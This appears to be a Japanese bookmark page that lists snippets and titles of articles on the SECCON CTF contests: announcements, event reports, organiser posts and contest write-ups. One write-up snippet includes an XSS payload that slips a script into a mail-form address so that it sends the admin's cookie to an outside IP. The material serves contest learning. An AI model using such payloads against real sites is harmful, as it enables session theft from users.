SECCON2013北陸前日勉強会のスライドです http://2013.seccon.jp/2013events.html 元データここ https://gist.github.com/mala/8112696
SECCON2013 slide
SECCON2013北陸前日勉強会のスライドです http://2013.seccon.jp/2013events.html 元データここ https://gist.github.com/mala/8112696
SECCON2013 北陸大会の前日勉強会の資料 スライド形式のはこちら https://speakerdeck.com/mala/seccon2013-slide
スマートフォンのセキュリティについて ma.la 自己紹介 http://ma.la https://twitter.com/bulkneets LINE株式会社 livedoor方面の人です 仕事 JavaScript, Perl 元々の専門領域はUI, フロントエンド Webアプリ全般 認証認可周り セキュリティに関する業務 自社サービスのリリース前にチェックしたりとか 何か新しい攻撃手法見つかったら調査 他社サービスの問題見つけて報告したり オープンソースプロダクトのバグ報告したり そもそも何でJavaScriptを書いてた人間が セキュリティに関することをやっているのか あらゆるデバイスでHTML + JavaScriptが使われている どこまで悪用できるのか、どうやって修正すべきなのか 社内でもっとも詳しい 基本的にはWebの人 iOS / Android アプリ開発あまり詳しく
プレスリリース | 「攻殻機動隊 REALIZE PROJECT × SECCON CTF for GIRLS」専用可視化エンジン“AMATERAS零”を開発 | NICT-情報通信研究機構
NICTサイバーセキュリティ研究室は、「攻殻機動隊 REALIZE PROJECT × SECCON CTF for GIRLS」専用可視化エンジンAMATERAS零(アマテラス・ゼロ)を開発しました。本技術は、サイバー模擬攻防戦CTF(Capture The Flag)をリアルタイムに視覚化するものであり、2015年11月7日(土)に開催される女性限定のCTF大会で実稼働いたします。セキュリティ技術の向上やサイバー攻撃の対処能力の強化を目的としたCTFを、攻殻機動隊という世界的に著名なSF作品をモチーフに視覚化することで、サイバーセキュリティへの関心を一層高め、さらに、セキュリティ人材の発掘・育成に貢献することが期待できます。
取り急ぎ 「#teamtomorinao」「友利奈緒 SECCON」「友利奈緒 文部科学大臣賞」などで検索してまとめました。 ツイートは適宜整理しますが、「誰でも編集可」にしましたので、良しなにお願いします。 ※ 俺のツイート入れてくれ or 消してくれ については、連絡頂ければ対応します!
去年(2013年)から今年にかけてSECCON2013というセキュリティコンテストの運営に参加させていただきました。主に問題作成担当だったので、もし参加された方がいましたら、いくつかの問題は私が作成したものだったかもしれません。 そのSECCONも先週末(3月1~2日)の決勝戦を終えてひとまずひと段落となりましたので、この1年で出題された(私が作った)問題一式を可能な限り公開したいと思います。 50000枚のアセンブラ短歌画像から 0609 と表示されるものを探せ http://07c00.com/tmp/tanka5t-50000.zip これは決勝戦で出題された問題(の一部)です。50000枚の画像がZIP圧縮されており、1枚1枚にはアセンブラ短歌(マシン語列)が書かれています。その中から 0609 を表示するものを探す問題でした。画像からテキスト(コード)を抽出し、それを実行するコー
国内最大規模のセキュリティコンテスト「SECCON 2017」開催。NICTがハッキングの攻防を可視化するツール投入で盛り上がる中、国内大会と国際大会で優勝したチームは?
国内最大規模のセキュリティコンテスト「SECCON 2017」開催。NICTがハッキングの攻防を可視化するツール投入で盛り上がる中、国内大会と国際大会で優勝したチームは? [フリーランスライター高橋睦美氏 執筆]2018年2月17日から19日にかけて、国内最大規模のセキュリティコンテスト「SECCON 2017」が開催されました。 2月17日は日本国内の学生・技術者による国内大会、2月18日と19日は米国や韓国、台湾など海外からのチームも含めたオンライン予選を勝ち抜いたチームによる国際大会が行われ、3日間にわたる熱戦が繰り広げられました。 国内大会には予選や連携大会を突破した24チームが、国際大会には招待チームも含め15チームが参加。オンライン予選には、過去最大となる102カ国からの参加があったそうです。 もはや「秘伝のソース」ではセキュリティを守れない SECCON 2017のメインイベ
SECCON13
ARCHIVE 過去のSECCON オフィシャルサイトはこちら SECCON 2023 SECCON 2022 CONTACT SECCONに関するお問い合わせは、お手数ではございますが、メールにてお願いいたします。 SECCON事務局(JNSA事務局内) E-Mail: ※「SECCON」ならびにSECCONロゴは登録商標です。
LifeMemoryTeamの@atponsです。今回のSECCON Beginners CTF 2020はお楽しみいただけたでしょうか。自分は運営やインフラ整備をしておりました。 今回は、自分が担当していた監視、オペレーション部分の構築回りについて書いておきます。 死活監視 バッジ 今回参加者のみなさんには、このようなバッジを問題に付与して提供しておりました。これによって、問い合わせのオペレーションを削減することを目標に、昨年も取り組んでおりました。バッジでは、そのタスク(問題からフラグを取れたかどうか、サービスに疎通できるかどうか)の成功可否を表示していました。 また、最後にタスクを実行した時間を表示できるようにしていました。このバッジ生成は完全に自作したものです。詳細は死活監視の部分で書きます。 タスクランナー 定期的に実行してその状態を知りたい、という要望にはCI/CDツールを応用
SECCON CTF 2013 オンライン予選のフォレンジックス400点の解法です。 競技中は解けませんでしたので、終わってからじっくり解いてみました。 問題:QRコードの断片を読み取れ 富士山麓で焼け落ちたQRコードの断片が発見された。 損傷が激しい。内容を復元することはできるだろうか? qr-photo.jpg QRコードの仕様について詳しく知らなかったので、調べました。 http://ja.wikipedia.org/wiki/QR%E3%82%B3%E3%83%BC%E3%83%89 ・バージョンがある(1〜40) ・誤り訂正レベルがある(L,M,Q,H) ・モードがある(数字、 英数字、8ビットバイト、漢字) ・どのモードを使っているかを表すモード指示子がある ・文字列/データの長さを表す文字数指示子がある ・QRコードは読み取り精度を高めるためにマスク処理が行われている ・どの
[CEDEC 2014]不正コピーやチートを防ぐには,セキュリティと啓蒙とゲーム業界の行動が必要。「SECCON x CEDEC CHALLENGE」の開会式講演をレポート
[CEDEC 2014]不正コピーやチートを防ぐには,セキュリティと啓蒙とゲーム業界の行動が必要。「SECCON x CEDEC CHALLENGE」の開会式講演をレポート ライター:箭本進一 2014年9月2日から9月4日まで神奈川県のパシフィコ横浜にて開催される「CEDEC2014」で,「SECCON x CEDEC CHALLENGE 開会式 / 不正コピーとチートの攻防戦」と題した講演が行われ,不正コピーやチートに対する啓蒙やシステム設計といった議題について話し合われた。 「SECCON」とは,情報セキュリティに携わる人材育成を目的とした,日本最大規模のセキュリティコンテストだ。「SECCON x CEDEC CHALLENGE」は,CEDECの会期中に会場で行われる「SECCON」の地方予選の一つであり,優勝者は全国大会に出場できる。その開会式で行われた講演のテーマが「不正コピー
情報セキュリティの知識や技術を競うコンテスト「SECCON CTF」が、2月18日(土)~19日(日)に福岡の九州工業大学で開催されます。参加者は学生が中心で、チームを組んでクイズ形式の問題や実験ネットワーク内での疑似的な攻防戦に挑みます。 ▽ http://www.seccon.jp/ ▽ SECCON CTF 福岡大会(九州地区予選) : ATND CTFは、「Capture the Flag(旗取り合戦)」の略で、セキュリティ技術を競うコンテストの総称です。競技は、ヨーロッパやアジア、オセアニアなど世界各国で行われています。セキュリティだけでなく、プログラミングや暗号、攻撃技術、防御技術、解析技術、ネットワーク技術など、幅広い知識や経験を問われるのが特徴です。 「第1回 SECCON CTF 福岡大会」は、九州工業大学の飯塚キャンパスで行われます。主催は、サイボウズ・ラボの竹迫良範さ
日本ネットワークセキュリティ協会(JNSA)は2013年6月7日、情報セキュリティに関する知識や技術を競う「SECCON 2013」を開催することを発表した。とかく不足が指摘されている情報セキュリティ人材の育成と裾野の拡大を目指した取り組みだ。 JNSAの会長、田中英彦氏は「ひんぱんにセキュリティ事件が発生する一方で、対抗できる人材は少ない」と述べ、CTFという機会を通じて「広い意味での人材育成につながってほしい」と期待を寄せている。 CTF(Capture The Flag)とは、コンピュータに関する知識を競い合うイベントの総称だ。最も有名な米国「DEFCON」のCTFには、世界中から数千人もの技術者が参加して問題回答型の予選を競い、その中を勝ち抜いた10チームが攻防戦形式の決勝に参加する。ほかにも、ロシアや韓国、台湾、シンガポールなど、CTFは世界各地で開催されており、参加者が技術を磨
SECCON 2013 CTF オンライン予選のWriteupとかまとめてみた。 - piyolog
2014年1月25日12時(JST)〜2014年1月26日12時(JST)にかけて、SECCON 2013 CTFの予選大会がオンラインで行われました。参加した皆様大変お疲れ様でした。終わって間もないにもかかわらず、たくさんの素晴らしいWriteUp記事を見つけたのでまとめてみます。 オンライン大会 概要 参加チーム数は全部で324チームでした。当初参加申し込みの期限は2014年1月24日12時となっていましたが、タイムゾーン指定がされていなかったことを理由として2014年1月24日 21時までに期限延長が行われています。24日12時時点で261チームだったようですが60チームぐらい追加登録したんですね。 オンライン大会のランキング(魚拓)を見ると1問も解いていないチームが74チーム、練習問題を中心に解いたと思われる100点のチームは79チームです。1000点に達しないチームが全体の7割を
【セキュリティ ニュース】SECCON決勝に決着、DEF CON出場権は誰の手に?(1ページ目 / 全1ページ):Security NEXT
1月30日、31日の2日間にわたり、国内最大となるセキュリティ技術の競技会「SECCON 2015 決勝大会」が都内で開催され、国内外から集結したハッカーが自慢の腕を振るった。 同イベントは、情報システムに関連するセキュリティ技術や知識などを競う国内最大級のCTF(Capture The Flag)競技大会。2012年より開催しており今回で4回目を迎えた。 今回は、初日に国内学生を対象とする「intercollege決勝大会」を開催。2日目に「international決勝大会」として地方予選や、65カ国から約3000人が参加したインターネット予選を勝ち抜いた腕利きハッカーが、「King of the Hill」形式の競技で腕を競った。 韓国から出場したチーム「Cykorkinesis(画像上段)」、台湾出身の「217(同中段)」、国内から出場したTomoriNao氏(TomoriNao)
SECCON 2014 オンライン予選(日本語) Write-up - kusano-k’s blog
ぼっチームsuperflipは1403点、24位だった。 練習問題 練習問題 100点 FLAG{seccon2014} このパケットを解析せよ ネットワーク 100点 FTP通信。FTPは制御とファイル転送は別のポートで行う。55番目のパケットに、 RkxBR3tGN1AgMTUgTjA3IDUzQ1VSM30=というファイルがあり、Base64デコードすると、 FLAG{F7P 15 N07 53CUR3} ソーシャルハック ネットワーク 300点 今流行のLINE乗っ取り。こちらの用意したサイトにアクセスさせると、 MyVNCpasswordIsVNCpass123というリファラが付いているので、接続元にVNCで接続すれば良い。 FLAG{giveMeYourWebM0n3y} decode me 暗号 100点 EUCの中国語ファイル。ROT13にすると英語部分が SECCON 2
【『王様達のヴァイキング』第13集発売記念】 サイバーセキュリティ業界も注目!! リアルすぎるエピソードにエンジニアも驚愕!? 「世界を変えるキャラクターとは?」SECCON2016トークセッションレポート(前編) | ビッグコミックBROS.NET(ビッグコミックブロス)|小学館
【『王様達のヴァイキング』第13集発売記念】 サイバーセキュリティ業界も注目!! リアルすぎるエピソードにエンジニアも驚愕!? 「世界を変えるキャラクターとは?」SECCON2016トークセッションレポート(前編) ビッグコミックスピリッツで連載中の、サイバー冒険譚『王様達のヴァイキング』(作・さだやす/ストーリー協力・深見 真)の最新第13集が7月28日(金)ごろ発売!! 難攻不落の強敵、蘇芳経産大臣の野望を挫くため、日米に分かれて戦う是枝と坂井。アメリカの情報監視システム「ミラージュ」に侵入するために好敵手・笑い猫と共闘する展開は激アツです!! サイバーセキュリティーの世界を舞台に戦うハッカー達の"バトル漫画"でもある本作は、実際にその世界で活躍している本業のセキュリティーエンジニアからも注目されているということで、去る2017年1月に都内で開催されたハッキング技術を競う競技大会「SE
CEDEC 2015で開催されたSECCON 2015横浜予選で、どういうわけか特別審査員とやらエラく大げさな名前のシロモノをやらせていただきました(記事)。 SECCONは簡単に書くと、セキュリティコンテスト、具体的にはどないしてサーバーのセキュリティを破るかといった攻撃をどんだけうまくやるのかとかを競う競技です(優秀な攻撃者はもちろん優秀な防御を考えられるので)。 その予選がCEDECで行われ、ゲームのチートをいかにうまくするか? が競われたわけです。 詳しい内容はSECCON 2015でも見ていただきたいのですが、簡単に内容を説明しますと、2つのAndroidソフトが渡され(サーバーと通信するもの)、それをチートしろ、という内容です。 クライアント本体をチートする方法は、チェックルーチン潰し・メモリハック・プログラムの書き換えといった、はるか遠い昔、PC88時代から連綿と伝わる伝統芸
SECCON 2013 横浜大会に参加してきた。1564点で1位。誰も解けなかった3問以外は全部解いた(・∀・) 以下、私(と周囲の人)の解法。後で問題が公開されるという噂もあるので、自力で解きたい人は見ない方が良い。 1. 練習問題(タイトルを忘れた)(バイナリ、10点) コピペ。 答え: seccon 2. SSBNewCommer(バイナリ、200点) Androidのアプリを解析する問題。 クリックするとそのマス目の色が変わり、特定の配置になるとFLAGが表示される(らしい)。プログラムは、 x = マスの配置を文字列に変換 if (x[0]=='B' && x[4]=='I' && sha1(x)=='50e878fe75ee49b31e68d85ffd54fc7e3a2605c') dialog('Flag:'+x)こんな感じ。探索するプログラムを書いて終わりかと思いきや、答え
明け方の運営会場はのんびりしていた 2016年12月11日、朝5時50分。某所のとある会議室前にたどり着くと、一晩中ついていたのだろう明かりが扉の隙間から漏れていました。そっと扉を開けると、平常運転を装いながら眠気がふんわり漂う「SECCON 2016 Online CTF」運営チームが迎えてくれました。 「CTF」は「Capture the Flag」(旗取りゲーム)の略称で、セキュリティの知識や技術力をゲーム形式で競うコンテストのことです。問題をできるだけ多く解いて答え(フラグ)の合計得点を競う“クイズ形式”や、謎解きが施された問題サーバを攻略した場合のフラグポイントと、フラグを他チームに盗られないよう妨害して得られる防御ポイントの合計で競う“攻防戦形式”が主流で、独自ルールや工夫を加えて世界各国で行われています。有名どころでは、アメリカの「DEF CON CTF」、韓国の「CODEG
【XSS Bonsai】 受賞のご挨拶 by @ymzkei5 【SECCON 2014】 - Dec 08, 2014
【XSS Bonsai】 受賞のご挨拶 by @ymzkei5 【SECCON 2014】 - Dec 08, 2014
CTF/Writeup/SECCON 2014 Quals Online Winter - 電気通信大学MMA
Writeups for SECCON 2014 オンライン予選(英語) SECCON 2014 Quals Online WinterにチームMMAとして参加した。最終順位は11位であった。 Welcome to SECCON (Start 100pts) 1. まず問題のページを開きます。 2. 問題文には次のように書いてあるので、目grep力を駆使して、答えを探します。 問題 The answer is "SECCON{20141206}". 問題(和訳) 答えは、「SECCON{20141206}」です。 結果: SECCON{20141206} Easy Cipher (Crypto 100pts) 2進数、8進数、10進数、16進数で記述された数字の列が渡される。判定は次のようにした。 0から始まる文字列なら8進数 [01]のみを含み5文字以上なら2進数 [0-9]のみを含むな
セキュリティの穴をつく相手の攻撃から身を守れ 見えない敵に技術で戦うハッカーのすゝめ “悪い人”ではなく“何かを突き詰めた人”こそがハッカーだ SECCON実行委員長・花田氏が語る、日本へのサイバー攻撃の動向とセキュリティ人材の現状 日々世界中から受ける攻撃から情報を守れているのは、セキュリティエンジニアをはじめとする、プロフェッショナルたちの努力の賜物と言えます。しかし、いわゆる“裏方”だからこそ、セキュリティに関わる人の話題が表にあがることは多くはありません。 そこで今回は、世界の情報セキュリティ分野で通用する実践的情報セキュリティ人材の発掘・育成を目的とするセキュリティコンテスト「SECCON」で実行委員長を務める花田氏に、サイバー攻撃の現状や日本のセキュリティ、セキュリティ人材の育成についてうかがいました。まずは、世界のサイバー攻撃の状況と日本のセキュリティについて。 攻撃のパケッ
システムアセスメント部の山崎です。 2016年1月30日(土) と 31日(日)に、セキュリティコンテスト SECCON 2015 決勝大会が開催されました。 この大会は、サイバー攻撃とその対策に必要なセキュリティ技術などを競う競技会で、国内さまざまな地方や、オンラインでおこなわれた予選を勝ち抜いてきた強豪チームが参加しました。 今年度は、1日目に「学生大会」が、2日目に「国際大会」がそれぞれおこなわれました。私は、国際大会の、6問の問題群のうちの1問を出題しました。(まさか、あんなことになるとは思わずに・・・。) 会場の様子 1日目におこなわれた「学生大会」では、地方予選と連携大会を勝ち抜いてきた学生18チームが出場しました。中学生から大学院生までのメンバーが、1チーム4人で参戦しました。 競技は、「Attack&Defense形式」という、お互いに弱点を持つサーバを運営し、自分のサーバ
学生対象の「SECCON」と社会人対象の「CTFチャレンジジャパン」が1つになり、所属や年齢を問わずに参加できる大会となった。主催する日本ネットワークセキュリティ協会は、「日本最大のハッカー大会を目指す」としている。 NPO法人の日本ネットワークセキュリティ協会(JNSA)は6月7日、広範なITセキュリティの技術や知識を競う大会「SECCON 2013」を8月から2014年3月まで実施すると発表した。昨年度は22歳以下もしくは学生が参加資格となっていたが、今回から経済産業省による社会人と23歳以上の学生が対象の「CTFチャレンジジャパン」と統合され、年齢や所属を問わず参加できる大会になる。 SECCONは、国や自治体、企業、組織を含めた日本の情報セキュリティ技術者人材の育成を目的に実施する競技イベント。4人1組のチームに分かれて、主催者の用意する課題をクリアしながら、得点を競い合う。参加者
来た、見た、やった! SECCON CTF福岡大会レポート サイバー大学准教授、JNSA研究員 園田道夫 2012/3/7 2月18日、19日の2日間にわたって、九州工業大学の飯塚キャンパス「MILAiS」を舞台に本格的なCapture The Flag(CTF)を開催しました。その模様と、開催に至るまでの経緯について紹介します。(編集部) 「ようやく開催にこぎつけた」という感がありますが、CTF、やってきました。福岡で。 おかげさまで大いに盛り上がりました。今回はそのレポートと、開催に至る経緯についてお話します。 日本におけるCTFの歴史 Capture The Flag(CTF)とは何かについては、すでにいろいろなところで取り上げられていますので割愛しますが、要はセキュリティ技術の腕比べ。クイズ戦と攻防戦の2タイプがあります。海外では盛んに行われており、競技への参加が、セキュリティ技術
SECCON 2013 全国大会カンファレンス開催概要 ■ SECCON 2013 全国大会 カンファレンス 日程:2014年3月1日(土) ~ 2014年3月2日(日) 場所:東京電機大学 東京千住キャンパス 1号館 2F丹羽ホール 地図:http://web.dendai.ac.jp/access/tokyosenju.html 形式:カンファレンス併催CTF全国大会 参加費:無料(事前登録制) ※一般の方もご参加いただけます 主催:SECCON実行委員会(日本ネットワークセキュリティ協会) 共催:東京電機大学 後援:情報セキュリティ政策会議(内閣官房情報セキュリティセンター) 総務省、文部科学省、経済産業省、警察庁、 独立行政法人 情報通信研究機構(NICT) 独立行政法人 情報処理推進機構(IPA) 一般財団法人 日本情報経済社会推進協会(JIPDEC) 一般社団法人 日本経済団体
2013「年度」の全国大会。私が所属していた某チームは、半分より下の順位だった(´・ω・`) 塔の名前が付いた6個のサーバーがあって、サーバーの中からキーワードを探し出すと点数ゲット、指定されたファイルにチームごとの文字列が書き込まれていると点数ゲット、という形式。解けた問題の解法。焦っていたので、キーワードとか解いている途中の様子とかをちゃんとメモしていなかった。問題サーバーのVMイメージが貰えたら、残りの問題も解いてみよう。 Korin 元ネタ: カリンの塔 1個目 管理者宛のメールフォーム。管理者向けページへの隠しリンクがあるが、アクセスできない。メールアドレスがきっちりチェックされていると思いきや、ローカル部(@の前)には何でも書ける。 "><script>location="http://192.168.1.3/?"+document.cookie</script>@aaa.bb
x86/x64のマシン語の長さを計算するコードとSECCONハッカソン - お前の血は何色だ!! 4
x86 と x64 のマシン語は可変長です。 ふつーはそれほど意識する必要はないのですが、 トランポリンフックやライブパッチを作る人だと、マシン語コードの長さを取得したい時があります。 たとえば、トランポリンを作るときに、破壊するバイト数を計算したり、 破壊してしまったメモリをうまくつなぎあわせて処理の効率化を測る場合には、必要になります。 まぁ、まれによくある。といった感じでしょうか? まれによくある程度なので、あんまりライブラリが整備されていないように思えます。 逆アセンブラであれば、用途は満たしますが、ソースコードがやや大きくなってしまったり、 ライセンスがあまり自由でないライセンスだったりするみたいです。 で、 それなら俺が作ってやんよってことで作ってみました。 でけた oplen https://github.com/rti7743/oplen x86とx64のマシン語サイズを求
やぎはしゅです。 ここ2日間、SECCON CTF 2013 決勝戦に参加していました。 チームは********で、なんかニコ生のコメントで触れてくれている人がいてほっこりしました。 結果は7位で、数字を見ると「うーん…」、上下のチームを見ると「おぉー」という感じです。 割と不完全燃焼ですねー、楽しかったけど。 順位はこれで最終版、のはずです。違ったら教えてください。 7-11位が団子状態ですね。団子の一番上で終わったのがうちのチームでした。 1日目、2日目それぞれの点数の推移です。 1日目は9位で終えて、2日目は10-12位あたりをうろうろした後に9位、7位と順位をあげてそのままフィニッシュという感じでした。 なんだかなぁ…。 問題(というかサーバ一覧)です。Korin, Pisa, HanoiがそれぞれWebから攻めていくタイプのサーバで、Hanoiの4つめを除い
[PDF]DNS水責め(Water Torture) 攻撃について /2014年9月27日 SECCON 2014 長野大会 DNS Security Challenge 株式会社日本レジストリサービス(JPRS) 森下 泰宏(Yasuhiro Orange Morishita)
Copyright © 2014 株式会社日本レジストリサービス 1 DNS水責め(Water Torture) 攻撃について 2014年9月27日 SECCON 2014 長野大会 DNS Security Challenge 株式会社日本レジストリサービス(JPRS) 森下 泰宏(Yasuhiro Orange Morishita) 最終更新:2014年10月2日 どんな攻撃なのか? • 2014年1~2月頃から世界的に観測され始めた、 DNSサーバーに対するDDoS攻撃の手法 – 攻撃は現在も続いている模様 • 2014年6~7月にかけて国内の複数のISPで発生 した「DDoS攻撃によるDNS障害」の原因の多く は、この攻撃によるものであったと考えられる – 複数の状況証拠 – 複数のISP関係者からの伝聞 Copyright © 2014 株式会社日本レジストリサービス 2 攻撃の
クリスマスソングが流れ、華やかなイルミネーションに彩られる横浜の町。その一角で、ノートPCやディスプレイ、技術専門書を抱えた面々が集い、ひたすら謎解きに取り組むセキュリティイベントが開催された。 12月22日、横浜の情報セキュリティ大学院大学(IISEC)を会場に「第4回SECCON横浜大会(関東地区)」が開催された。SECCONは、セキュリティ技術の底上げと人材の発掘・育成を図ることを目的としたCTF(Capture the Flag)大会だ。 CTF大会にも、互いに擬似的にシステムを攻撃、防御し合うもの、主催者が用意したシナリオの元で運用/対応能力を競うものなどさまざまなパターンがあるが、SECCONが実施しているのはトリビア式のCTF。暗号、バイナリ、ネットワーク、Web、プログラミングなど、さまざまな分野から出題される「問題」を解いて得点を競う形式だ。 これまで同様の大会を九州、つ
1月30日と31日、SECCON実行委員会と日本ネットワークセキュリティ協会(JNSA)が主催するセキュリティコンテスト「SECCON 2015」が東京で開催された。情報セキュリティ分野の総合知識と実践的技能を競うゲーム形式の本競技会だが、今年は学生大会と国際大会が日を分けて開催され、例年以上の盛り上がりを見せた。熱戦の模様をレポートする。 チーム間の激しいポイントの削り合いがアツイ!学生大会 今年のSECCONは、学生大会の「Intercollege決勝大会」と国際大会の「International決勝大会(国際大会)」に分けて開催された。その理由について、SECCON実行委員会 委員長の竹迫良範氏は「人材育成や発掘という目的を意識した結果」だと話す。 昨年のSECCON決勝大会は、優勝すれば米国で開催されるハッカーカンファレンス「DEF CON」のCTF出場権が獲得できることもあり、世
SECCON CTF 2014 online 予選 のWriteupとかをまとめる予定地 - piyolog
まとめる予定地です。 概要 開催日時 2014/12/06 9:00(JST) 〜 2014/12/07 17:00(JST) (32時間) 詳細:http://2014.seccon.jp/winter2014quals.html 問題一覧 ID Title Genre Score 突破チーム数 最速突破チーム S1 Welcome to SECCON Start 100 794 TonkatsuNabe 2014/12/6 9:00:09 C1 Easy Cipher Crypto 100 470 MMA 2014/12/6 9:16:50 C2 Decrypt it (Easy) Crypto 200 66 HITCON 2014/12/7 0:57:23 C3 Decrypt it (Hard) Crypto 300 10 PPPwning 2014/12/7 10:16:04 C
SECCON 2016 Online Exploit作問 1/2 (cheer_msg, checker, shopping) - つれづれなる備忘録
これはCTF Advent Calendar2016の12日目の記事です. www.adventar.org みなさん,SECCON 2016 Onlineお疲れ様でした!!(この記事書いてるのは開催前なんですけどね) 今回は作問にTokyoWesternsとして協力させて頂いたので,例年とは少し趣向の変わった問題をいくつか出題出来たと思います. いかがでしたでしょうか 本記事では,私が作問したExploit問題 chat, checker, mboard, shopping, cheer_msg の5問について扱います. 難易度(点数)順に解説していきますね. それと,解き方については様々でしょうが,ここに示すのはあくまでも一例なので,他にも解き方が無いかいろいろと試してみてください. はじめに SECCONとは 本記事について 問題のバイナリおよびソースコード 使用ライブラリ chee
国内最大級のハッキングコンペ「SECCON」が6月29日からスタートする。今回は女性限定の大会や英語による予選なども実施し、国内外からの参加を募る。 日本ネットワークセキュリティ協会は6月10日、国内最大級のハッキングコンテスト「SECCON 2014」を29日から開催すると発表した。2015年2月の全国大会まで多数の競技を開催する予定で、国内外からのべ2000人の参加を見込んでいる。 SECCONは今年で3回目を迎える。昨年から学生や社会人の区分け無く参加できる大会となり、全国から509チーム・1312人が参加。内訳は学生が約55%、社会人が45%で、セキュリティ分野を選考する学生や主業務とする社会人以外にも、多くの人が参加した。 SECCON 2014では新たに、女性限定の「CTF for Girls」や英語によるオンライン予選なども導入する。29日に東京・六本木ヒルズ森タワーで開催さ
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
日本最大のハッキングコンテスト「SECCON 2013」、8月から全国で地方予選
チーム #友利奈緒 、 #SECCON 2015 決勝にて文部科学大臣賞受賞までの流れ #teamtomorinao
SECCON2013で出題した問題一式を公開しました。 - バイナリの歩き方
Amazon.co.jp: セキュリティコンテストチャレンジブック -CTFで学ぼう! 情報を守るための戦い方-: 碓井利宣 (著), 竹迫良範 (著), 廣田一貴 (著), 保要隆明 (著), 前田優人 (著), 美濃圭佑 (著), 三村聡志 (著), 八木橋優 (著), SECCON実行委員会 (監修): 本
ハッキングの「サイバー甲子園」開催、若い人材が暗黒面へ堕ちぬよう表舞台のキャリアパス創出 今年のCTF大会「SECCON 2015」は学生限定枠を新設
SECCON Beginners CTF 2020の監視・オペレーションを支える技術 - ポン酢ブログ(β)
SECCON CTF 2013 online予選 forensics 400
情報セキュリティの知識や技術を競う大会「SECCON CTF」、福岡で2/18から2日間開催 - はてなニュース
国内最大のハッカー大会「SECCON 2014」、今年は男子禁制ガールズイベントも
年齢、所属不問! セキュリティコンテスト「SECCON 2013」、8月から開催
SECCON 2015 で喋ったこと::Colorful Pieces of Game
"DNSの学び方" - SECCON 2014 長野大会 鈴木常彦先生 (@.tss_ontap)
SECCON 2013 横浜大会 Write-up - kusano-k’s blog
SECCON 2016 Online予選、運営の裏側をレポート | さくらのナレッジ
“悪い人”ではなく“何かを突き詰めた人”こそがハッカーだ SECCON実行委員長・花田氏が語る、日本へのサイバー攻撃の動向とセキュリティ人材の現状
SECCON 2015 決勝大会が開催されました! | セキュリティ対策のラック
日本最大級のセキュリティ競技大会に、「SECCON 2013」が8月開幕
SECCON CTF福岡大会レポート(1/3) - @IT
SECCON 2013 全国大会カンファレンス開催概要 - SECCON 2013
SECCON 2013 全国大会 Write-up - kusano-k’s blog
SECCON CTF 2013 FINAL | やぎはしゅブログ
パケット解析にクルシミマス? SECCON横浜大会開催
今年は学生ハッカーの攻防戦も!「SECCON 決勝大会」レポート (1/2)
セキュリティの猛者求む SECCON 2014が6月末に開幕